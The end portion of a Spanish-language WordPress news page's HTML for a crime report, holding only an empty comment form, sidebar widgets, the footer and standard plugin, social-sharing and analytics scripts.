	</div> <!-- ./span6 --></div><!--./row-fluid--></div>
                        <div class="comments" id="comments">
                                                                                                <div class="comments-title-wrap">
                                                                                <h4 class="block-title"><span>SIN COMENTARIOS</span></h4>
                                    </div>

                                                                                            	<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title">Enviar un Comentario <small><a rel="nofollow" id="cancel-comment-reply-link" href="/asaltaron-y-balearon-a-un-ciudadano-chino/#respond" style="display:none;">Cancelar respuesta</a></small></h3>			<form action="https://www.videotarnoticias.com/wp-comments-post.php" method="post" id="commentform" class="comment-form" novalidate>
				<div class="clearfix"></div><p class="comment-form-input-wrap"><textarea class="needsclick" placeholder="Comentario:" id="comment" name="comment" cols="45" rows="8" aria-required="true"></textarea></p><p class="comment-form-input-wrap">
            <span class="comment-req-wrap needsclick"><input class="" id="author" name="author" placeholder="Nombre:" type="text" value="" size="30" /></span></p>
<p class="comment-form-input-wrap">
            <span class="comment-req-wrap needsclick"><input class="" id="email" name="email" placeholder="Email:" type="text" value="" size="30" /></span></p>
<p class="comment-form-input-wrap needsclick">
            <input class="" id="url" name="url" placeholder="Sitio Web:" type="text" value="" size="30" /></p>
<p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Comentario" /> <input type='hidden' name='comment_post_ID' value='8738' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p><p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="402db42cce" /></p><p class="comment-subscription-form"><input type="checkbox" name="subscribe_comments" id="subscribe_comments" value="subscribe" style="width: auto; -moz-appearance: checkbox; -webkit-appearance: checkbox;" /> <label class="subscribe-label" id="subscribe-label" for="subscribe_comments">Recibir un email con los siguientes comentarios a esta entrada.</label></p><p class="comment-subscription-form"><input type="checkbox" name="subscribe_blog" id="subscribe_blog" value="subscribe" style="width: auto; -moz-appearance: checkbox; -webkit-appearance: checkbox;" /> <label class="subscribe-label" id="subscribe-blog-label" for="subscribe_blog">Recibir un email con cada nueva entrada.</label></p><p style="display: none;"><input type="hidden" id="ak_js" name="ak_js" value="228"/></p>			</form>
			</div><!-- #respond -->
	<p class="akismet_comment_form_privacy_notice">Este sitio usa Akismet para reducir el spam. <a href="https://akismet.com/privacy/" target="_blank" rel="nofollow noopener">Aprende cómo se procesan los datos de tus comentarios</a>.</p>                                                    </div> <!-- /.content -->


                </div>
                <div class="span4 column_container td-post-sidebar" role="complementary" itemscope="itemscope" itemtype="https://schema.org/WPSideBar">
                    <aside class="widget widget_text">			<div class="textwidget"><div id="TT_RyQEZ1cEsWcx8NDUsftggggwgKlUMY8kpzkj1hIZgJt1kE1EE"><a href="http://www.tutiempo.net">El tiempo 15 días</a></div>
<script type="text/javascript" src="http://www.tutiempo.net/widget/eltiempo_RyQEZ1cEsWcx8NDUsftggggwgKlUMY8kpzkj1hIZgJt1kE1EE"></script></div>
		</aside><aside class="widget widget_text">			<div class="textwidget"><br></div>
		</aside><aside class="widget widget_text">			<div class="textwidget"><br></div>
		</aside><aside class="widget widget_text">			<div class="textwidget"><a class="twitter-timeline"  href="https://twitter.com/TARTAGALTV" data-widget-id="536169702188662784">Tweets por el @TARTAGALTV.</a>
<script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0],p=/^http:/.test(d.location)?'http':'https';if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src=p+"://platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");</script></div>
		</aside>                </div>
            
                             </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
            <div class="td-footer-wrap">
        <div class="container">
            <div class="row">
                
                            <div class="span12">
                                <div class="td-grid-wrap">
                                    <div class="container-fluid">
                                        <div class="wpb_row row-fluid ">
                                            <div class="span4 wpb_column column_container">
                                                                                            </div>

                                            <div class="span4 wpb_column column_container">
                                                                                            </div>
                                            <div class="span4 wpb_column column_container">
                                                                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>

                                    </div>
        </div>
    </div> <!-- /.td-footer-wrap  -->



<div class="td-sub-footer-wrap">
    <div class="container ">
        <div class="row">
            <div class="span12">
                <div class="td-grid-wrap">
                    <div class="container-fluid">
                        <div class="row-fluid ">
                            <div class="span4 td-sub-footer-copy">
                                &copy; VideotarNoticias                            </div>
                            <div class="span8 td-sub-footer-menu">

                                                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>


</div>
<!--/#inner-wrap-->
</div>
<!--/#outer-wrap-->

<div class="td-sp td-scroll-up"></div>

<!-- ngg_resource_manager_marker --><script type='text/javascript' src='https://www.videotarnoticias.com/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='https://www.videotarnoticias.com/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='https://www.videotarnoticias.com/wp-includes/js/jquery/ui/tabs.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='https://www.videotarnoticias.com/wp-includes/js/jquery/ui/accordion.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='https://www.videotarnoticias.com/wp-content/plugins/newsplus-shortcodes/assets/js/custom.js?ver=4.9.7'></script>
<script type='text/javascript' src='https://www.videotarnoticias.com/wp-content/plugins/newsplus-shortcodes/assets/js/jquery.easing.min.js?ver=4.9.7'></script>
<script type='text/javascript' src='https://www.videotarnoticias.com/wp-content/plugins/newsplus-shortcodes/assets/js/froogaloop2.min.js?ver=4.9.7'></script>
<script type='text/javascript' src='https://www.videotarnoticias.com/wp-content/plugins/newsplus-shortcodes/assets/js/jquery.flexslider-min.js?ver=4.9.7'></script>
<script type='text/javascript' src='https://www.videotarnoticias.com/wp-content/plugins/jetpack/_inc/build/photon/photon.min.js?ver=20130122'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var wpcf7 = {"apiSettings":{"root":"https:\/\/www.videotarnoticias.com\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"},"recaptcha":{"messages":{"empty":"Por favor, prueba que no eres un robot."}}};
/* ]]> */
</script>
<script type='text/javascript' src='https://www.videotarnoticias.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.0.3'></script>
<script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201831'></script>
<script type='text/javascript' src='https://www.videotarnoticias.com/wp-content/plugins/kopa-forceful-toolkit/js/kopa-user-rating.js'></script>
<script type='text/javascript' src='https://www.videotarnoticias.com/wp-content/plugins/kopa-forceful-toolkit/js/shortcodes.js'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var pollsL10n = {"ajax_url":"https:\/\/www.videotarnoticias.com\/wp-admin\/admin-ajax.php","text_wait":"Tu \u00faltima petici\u00f3n est\u00e1 a\u00fan proces\u00e1ndose. Por favor, espera un momento \u2026","text_valid":"Por favor, elige una respuesta v\u00e1lida para la encuesta.","text_multiple":"N\u00famero m\u00e1ximo de opciones permitidas:","show_loading":"1","show_fading":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='https://www.videotarnoticias.com/wp-content/plugins/wp-polls/polls-js.js?ver=2.73.8'></script>
<script type='text/javascript' src='https://secure.gravatar.com/js/gprofiles.js?ver=2018Augaa'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var WPGroHo = {"my_hash":""};
/* ]]> */
</script>
<script type='text/javascript' src='https://www.videotarnoticias.com/wp-content/plugins/jetpack/modules/wpgroho.js?ver=4.9.7'></script>
<script type='text/javascript' src='https://www.videotarnoticias.com/wp-content/themes/Newspaper_Theme/js/td_external.js?ver=4.2.2'></script>
<script type='text/javascript' src='https://www.videotarnoticias.com/wp-content/themes/Newspaper_Theme/js/full_compact/site.js?ver=4.2.2'></script>
<script type='text/javascript' src='https://www.videotarnoticias.com/wp-includes/js/wp-embed.min.js?ver=4.9.7'></script>
<script type='text/javascript' src='https://www.videotarnoticias.com/wp-content/plugins/jetpack/_inc/build/spin.min.js?ver=1.3'></script>
<script type='text/javascript' src='https://www.videotarnoticias.com/wp-content/plugins/jetpack/_inc/build/jquery.spin.min.js?ver=1.3'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var jetpackCarouselStrings = {"widths":[370,700,1000,1200,1400,2000],"is_logged_in":"","lang":"es","ajaxurl":"https:\/\/www.videotarnoticias.com\/wp-admin\/admin-ajax.php","nonce":"fec84300a4","display_exif":"1","display_geo":"1","single_image_gallery":"1","single_image_gallery_media_file":"","background_color":"black","comment":"Comentario","post_comment":"Publicar comentario","write_comment":"Escribir un Comentario...","loading_comments":"Cargando comentarios...","download_original":"Ver tama\u00f1o completo <span class=\"photo-size\">{0}<span class=\"photo-size-times\">\u00d7<\/span>{1}<\/span>","no_comment_text":"Por favor, aseg\u00farate de enviar el texto con tu comentario.","no_comment_email":"Por favor, proporciona una direcci\u00f3n de correo electr\u00f3nico para comentar.","no_comment_author":"Por favor, a\u00f1ade tu nombre al comentario.","comment_post_error":"Lo sentimos, pero hubo un error al publicar tu comentario. Por favor, vuelve a intentarlo m\u00e1s tarde.","comment_approved":"Se aprob\u00f3 tu comentario.","comment_unapproved":"Tu comentario est\u00e1 en moderaci\u00f3n.","camera":"C\u00e1mara","aperture":"Abertura","shutter_speed":"Velocidad de obturaci\u00f3n","focal_length":"Longitud focal","copyright":"Derechos","comment_registration":"0","require_name_email":"1","login_url":"https:\/\/www.videotarnoticias.com\/wp-login.php?redirect_to=https%3A%2F%2Fwww.videotarnoticias.com%2Fasaltaron-y-balearon-a-un-ciudadano-chino%2F","blog_id":"1","meta_data":["camera","aperture","shutter_speed","focal_length","copyright"],"local_comments_commenting_as":"<fieldset><label for=\"email\">Correo electr\u00f3nico (Obligatorio)<\/label> <input type=\"text\" name=\"email\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-email-field\" \/><\/fieldset><fieldset><label for=\"author\">Nombre (Obligatorio)<\/label> <input type=\"text\" name=\"author\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-author-field\" \/><\/fieldset><fieldset><label for=\"url\">Web<\/label> <input type=\"text\" name=\"url\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-url-field\" \/><\/fieldset>"};
/* ]]> */
</script>
<script type='text/javascript' src='https://www.videotarnoticias.com/wp-content/plugins/jetpack/_inc/build/carousel/jetpack-carousel.min.js?ver=20170209'></script>
<script async="async" type='text/javascript' src='https://www.videotarnoticias.com/wp-content/plugins/akismet/_inc/form.js?ver=4.0.8'></script>
<script type='text/javascript' src='https://www.videotarnoticias.com/wp-includes/js/comment-reply.min.js?ver=4.9.7'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var sharing_js_options = {"lang":"en","counts":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='https://www.videotarnoticias.com/wp-content/plugins/jetpack/_inc/build/sharedaddy/sharing.min.js?ver=6.3.2'></script>
<script type='text/javascript'>
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-twitter', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomtwitter', 'menubar=1,resizable=1,width=600,height=350' );
				return false;
			});
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-facebook', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomfacebook', 'menubar=1,resizable=1,width=600,height=400' );
				return false;
			});
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-google-plus-1', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomgoogle-plus-1', 'menubar=1,resizable=1,width=480,height=550' );
				return false;
			});
</script>
<div id="fb-root"></div>
<script>(function(d, s, id) {
  var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) return;
  js = d.createElement(s); js.id = id;
  js.src = "//connect.facebook.net/es_LA/sdk.js#xfbml=1&appId=608933065895722&version=v2.0";
  fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script>
	<div style="display:none">
	</div>


    <!--
        Theme: Newspaper by tagDiv 2014
        Version: 4.2.2 (rara)
        Deploy mode: deploy
        
    -->

    
	<script type="text/javascript">
		window.WPCOM_sharing_counts = {"https:\/\/www.videotarnoticias.com\/asaltaron-y-balearon-a-un-ciudadano-chino\/":8738};
	</script>

<!-- JS generated by theme -->

<script>
    
</script>

<script type='text/javascript' src='https://stats.wp.com/e-201831.js' async='async' defer='defer'></script>
<script type='text/javascript'>
	_stq = window._stq || [];
	_stq.push([ 'view', {v:'ext',j:'1:6.3.2',blog:'79372390',post:'8738',tz:'-3',srv:'www.videotarnoticias.com'} ]);
	_stq.push([ 'clickTrackerInit', '79372390', '8738' ]);
</script>
        <script type="text/javascript">
            function AI_responsive_widget() {
                jQuery('object.StefanoAI-youtube-responsive').each(function () {
                    jQuery(this).parent('.fluid-width-video-wrapper').removeClass('fluid-width-video-wrapper').removeAttr('style').css('width', '100%').css('display', 'block');
                    jQuery(this).children('.fluid-width-video-wrapper').removeClass('fluid-width-video-wrapper').removeAttr('style').css('width', '100%').css('display', 'block');
                    var width = jQuery(this).parent().innerWidth();
                    var maxwidth = jQuery(this).css('max-width').replace(/px/, '');
                    var pl = parseInt(jQuery(this).parent().css('padding-left').replace(/px/, ''));
                    var pr = parseInt(jQuery(this).parent().css('padding-right').replace(/px/, ''));
                    width = width - pl - pr;
                    if (maxwidth < width) {
                        width = maxwidth;
                    }
                    jQuery(this).css('width', width + "px");
                    jQuery(this).css('height', width / (16 / 9) + "px");
                    jQuery(this).find('iframe').css('width', width + "px");
                    jQuery(this).find('iframe').css('height', width / (16 / 9) + "px");
                });
            }
            if (typeof jQuery !== 'undefined') {
                jQuery(document).ready(function () {
                    var tag = document.createElement('script');
                    tag.src = "https://www.youtube.com/iframe_api";
                    var firstScriptTag = document.getElementsByTagName('script')[0];
                    firstScriptTag.parentNode.insertBefore(tag, firstScriptTag);
                    AI_responsive_widget();
                });
                jQuery(window).resize(function () {
                    AI_responsive_widget();
                });
            }
                </script>
        </body>
</html>